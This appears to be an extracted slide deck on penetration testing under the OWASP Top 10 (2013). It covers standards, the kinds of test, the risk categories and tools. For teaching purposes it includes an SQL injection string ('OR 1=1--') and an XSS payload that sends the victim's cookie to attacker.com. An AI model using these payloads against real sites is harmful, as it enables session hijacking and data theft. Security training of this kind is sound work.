Penetration Testing followingOWASP

Boyan Yanchev – Chief Technology OfcerPeter Dimkov – IS Consultant

За Лирекс

“Penetration testing”

A method of compromising the security of a computer system or network by simulating an attack by a malicious hacker.

Pentest Requirements by Standards

PCI-DSSRequirement 11: Regularly test security systems and processes.

GDPRArticle 32, 1 (d) - a process for regularly testing, assessing and

evaluating the effectiveness of technical and organisational measures for ensuring the security of the procssing.

ISO 27001A.12.6 – Technical vulnerability managementA.9.4 – System and application access controlA.11.1.4 – Protecting against external and environmental threatsA.12.2 – Protection from malwareA.14.2.8 – System Security Testing…..

Types of “Penetration tests” (by target scope)

Vulnerability assessment Infrastructure Penetration tests

InternalExternal

WEB/Application Penetration testsStatic WEB SiteDynamic content and applications

Mobile application Penetration tests

OSI Model

Open Systems Interconnection model (OSI model)

Top 10 threats defined by OWASP for 2013

Open Web Application Security Project List of the Top 10 most critical WEB Application Security Risks

The top 10 threats defined by OWASP for 2013 include: A1: Injection (Injection flaws, such as SQL, OS, and LDAP injection) A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Missing Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects and Forwards

Totally free to use for personal and business use

OWASP Top 10 2017

OWASP Top 10 2017 RC1 – Rejected

OWASP Top 10 2017 RC2 – Released (20.10.2017)

New OWASP Top 10 2017 is to be released in late November 2017

Top 10 threats defined by OWASP for 2013

Author: Alan ZeichickPrincipal Analyst, Camden Associates

A1. Injections

Injection attacks occur when unvalidated input is embedded in an instruction stream

Impact - SEVERE!

Data can be stolen, modified, deleted

Client-side controls can easily be bypassed by an attacker

Related to:SQLLDAPAnything that builds up a query from a user input

SQL Injection – Illustrated (source: OWASP)

Firewall

Hardened OS

Web Server

App Server

Firewall

Data

base

s

Lega

cy S

yste

ms

Web

Ser

vice

s

Dire

ctor

ies

Hum

an R

esrc

s

Billi

ng

Custom Code

APPLICATIONATTACK

Net

wor

k La

yer

Appl

icat

on L

ayer

Acco

unts

Fina

nce

Adm

inist

rato

nTr

ansa

cton

s

Com

mun

icat

onKn

owle

dge

Mgm

tE-

Com

mer

ceBu

s. F

unct

ons

HTTP request

SQL query

DB Table

HTTP response

"SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’"

1. Applicaton presents a form to the atacker2. Atacker sends an atack in the form data3. Applicaton forwards atack to the database in a SQL query

Account Summary

Acct:5424-6066-2134-4334Acct:4128-7574-3921-0192Acct:5424-9383-2039-4029Acct:4128-0004-1234-0293

4. Database runs query containing atack and sends encrypted results back to applicaton

5. Applicaton decrypts data as normal and sends results to the user

Account:

SKU:

Account:

SKU:

Injection

A1. Injections

Source: http://codecurmudgeon.com/wp/sql-injecton-hall-of-shame/

A2. Broken Authentication and Session Management

Hijacking a user’s session

HTTP is a “stateless” protocol which means that credentials have to go with every request

SESSION ID used to track state.

A2. Broken Authentication and Session Management

Vulnerabilities:sessionIDs are being stored in the URL

Guessable sessionIDssessionIDs are not timing outPasswords are not stored hashedCredentials are sent over plain text

A3. Cross-Site Scripting (XSS)

The most prevalent web application security flaw

Enables the attacker to execute scripts in victim’s browser

Used to:steal user’s session;steal sensitive data;rewrite web page (insert malicious content);redirect user to phishing or malware site

Be sure to sanitize your input fields!

A3. Cross-Site Scripting (XSS)

<script>alert(XSS Attack!)</script>

<script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>

A4. Insecure Direct Object References

Accessing data or system by changing a parameter value which refers to an object that the user is not authorized to access

A7. Missing Function Level Access Control

Threat: unauthorized access to functionality (Privileged escalation)

Authorization checks are used in order to generate appropriate menus and/or show/hide various options

If an attacker is aware of the presence of these other functions he could attempt to call them

If the server does not check the permissions for this user, the privilege escalation is successful

A5. Security Misconfiguration

Attack vectors:Missing (outdated) patches;Misconfigurations;Use of default accounts;Use of unnecessary services and features;Unprotected files and directories;Error messages not customized or blocked

A5. Security Misconfiguration

A6. Sensitive Data Exposure

When high value data (passwords, credit card data, e-mails, etc.) is not properly handled by the application and not adequately protected on the WEB Site

Data Exposure is at serious risk!

Evaluate the high value dataUse encryption

A8. Cross-Site Request Forgery (CSRF)

An attacker can cause the victim to change their password, username, email, send private message from victim’s account, steal money, order stuff with a click of a link

Most frameworks have a mechanism to protect from CSRF

A9. Using Components with Known Vulnerabilities

Using things like framework libraries, plugins and such

Components often run with the full privilege of the application

Finding exploits for particular component (is components are not updated)

Exploit the vulnerability

Prevention:Write your own componentsAlways update with the most current version

A10. Unvalidated Redirects and Forwards

The possibility of a WEB application to accept an untrusted input that could cause the WEB application to redirect to the request URL, contained within the untrusted input

Launching phishing scamsStealing credentials

Tools

Vulnearbility Assessment tools:OpenVASAcunetixQualysNessus

Metasploit FrameworkThe Pentesters Framework (PTF)Kali Linux

NmapAirCrackSQLMapEthercap

WiresharkNikto/Wikto SiteDiggerProxies

Paros ProxyOWASP ZAPBurp Suite

Various Browser Plugins

Thank you!